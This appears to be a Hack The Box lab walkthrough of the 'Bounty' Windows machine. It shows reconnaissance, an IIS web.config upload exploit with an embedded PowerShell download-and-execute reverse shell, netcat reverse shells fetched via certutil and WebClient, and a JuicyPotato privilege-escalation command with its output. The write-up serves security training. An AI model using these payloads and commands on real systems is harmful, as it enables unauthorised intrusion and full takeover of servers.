Hack The Box – Bounty Walkthrough

Hack The Box bounty machine title picture

Overview

This overview shows the direct path to the solution of the Hack The Box – Bounty box without giving the commands or tools used in the solution. There is an ISS webserver running on the machine which has a insecure file upload vulnerability. User flag is there, it is just hidden. For the privilege escalation, a specific user privilege is exploited, one of the most famous one.

This machine is listed in the TJ Null’s OSCP preperation list.

Detailed Walkthrough

My IP: 10.10.16.9

Machine IP: 10.10.10.93

Machine Link: https://app.hackthebox.com/machines/142

Initial Foothold

Start with default nmap scan

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# nmap -sC -sV -p- -Pn 10.10.10.93 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-15 13:52 EST
Nmap scan report for 10.10.10.93
Host is up (0.083s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Single port is open. ISS is running on port 80. Version 7.5 indicates it is either a Windows 7 or Windows Server 2008. Check the versions from here.

Landing page of the webserver. There is nothing to interact and nothing suspicious in the source code either.

We have nothing to do, so it is a good time for directory discovery. My favorite tool for webserver brute-forcing is FFUF.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt:FUZZ -u http://bounty.htb/FUZZ -e ".asp,.aspx,.php,.config"
[REDACTED]
transfer.aspx           [Status: 200, Size: 941, Words: 89, Lines: 22, Duration: 182ms]
uploadedfiles           [Status: 301, Size: 155, Words: 9, Lines: 2, Duration: 181ms]
[REDACTED]

We found what we need to solve this box. However, since this is a ISS Webserver, you may want use a ISS common directories wordlist. Findings were unimportant but. You can discover these directories by running consecutively or recursively with the wordlist.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# ffuf -w ~/PREP/HTB/bounty/iss-webserver-common-directories.txt:FUZZ -u http://bounty.htb/aspnet_client/system_web/FUZZ 
[REDACTED]
2_0_50727               [Status: 301, Size: 176, Words: 9, Lines: 2, Duration: 121ms]
2_0_50727/              [Status: 403, Size: 1233, Words: 73, Lines: 30, Duration: 121ms]
:: Progress: [1305/1305] :: Job [1/1] :: 369 req/sec :: Duration: [0:00:04] :: Errors: 1 ::
[REDACTED]

This webserver only accepts image files. It checks only file extensions, and there is no way to upload other than .png and .jpg files. After some research, I found there is an upload config vulnerability in IIS web servers. We upload a file named `web.config` with a reverse shell. For the reverse shell I used Nishang’s Invoke-PowerShellTCP.ps1. I fire up a simple http server with python to serve the reverse shell and upload the below config file.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
          <hiddenSegments>
            <remove segment="web.config" />
          </hiddenSegments>
       </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<%
Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.16.9/Invoke-PowerShellTcp.ps1')")
%>
-->

I added the below line at the end of the Invoke-PowerShellTCP.ps1 file to immediate execution.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.9 -Port 4444

Take a look at these resources also for the reverse shells inside web config files.

Please note that, user.txt file is a hidden file and it cannot be seen with regular dir command.

C:\Users\merlin\Desktop>dir /ah
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/29/2018  11:22 PM               282 desktop.ini
02/15/2024  08:45 PM                34 user.txt
               2 File(s)            316 bytes
               0 Dir(s)  11,575,607,296 bytes free


C:\Users\merlin\Desktop>type user.txt
type user.txt
077e556b4a931353****************

Privilege Escalation

After the initial foothold. With basic enumeration we realize that we can use potato attacks. This can be also discovered by automated tools too.

PS C:\Users\merlin> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
bounty\merlin S-1-5-21-2239012103-4222820348-3209614936-1000

[REDACTED]

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Users\merlin> cd ..
PS C:\Users> dir

[REDACTED]

I switched to cmd at this point, since I feel more comfortable with it. However, this exact operation can be done with powershell too.

PS C:\temp> (New-Object System.Net.WebClient).DownloadFile('http://10.10.16.9/nc.exe', 'C:\temp\nc.exe')
PS C:\temp> .\nc.exe 10.10.16.9 9000 -e cmd.exe

Then upload JuicyPotato attack and get the System Authority. Check here for detailed information about Potato Attacks. CLSID list here.

C:\temp>certutil -urlcache -f http://10.10.16.9/juicy.exe juicy.exe
certutil -urlcache -f http://10.10.16.9/juicy.exe juicy.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

C:\temp>juicy.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.16.9 9001" -t *
juicy.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\temp\nc.exe -e cmd.exe 10.10.16.9 9001" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Get Administrator shell on the listener.

┌──(root㉿kali)-[~/PREP/HTB/bounty]
└─# nc -nvlp 9001                                    
listening on [any] 9001 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.93] 49170
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

C:\Users\Administrator\Desktop>type root.txt
type root.txt
f801144e9492d081****************

Conclusion & Comments

This was a fun box. I was not aware of the web.config file upload vulnerability of ISS webservers. It took almost one day for me to find this vulnerability. I tried to upload a malicious image file which contains php reverse shell, meterpreter shells with .asp and .aspx files, and various combinations of those with .jpg and .png files. I also modify the magic bytes and file extensions. None of them worked properly. Also, I know there are hidden files in Windows too, but I realized that, I have not used a command like \dir /ah in a windows machine for hidden files. For the privilege escalation part, it was quite easy. If a box is couple years old and windows, just throw potato attacks to them, it should work most of the time.

You never know when do you need Nishang.

Other Notable Resources

Tags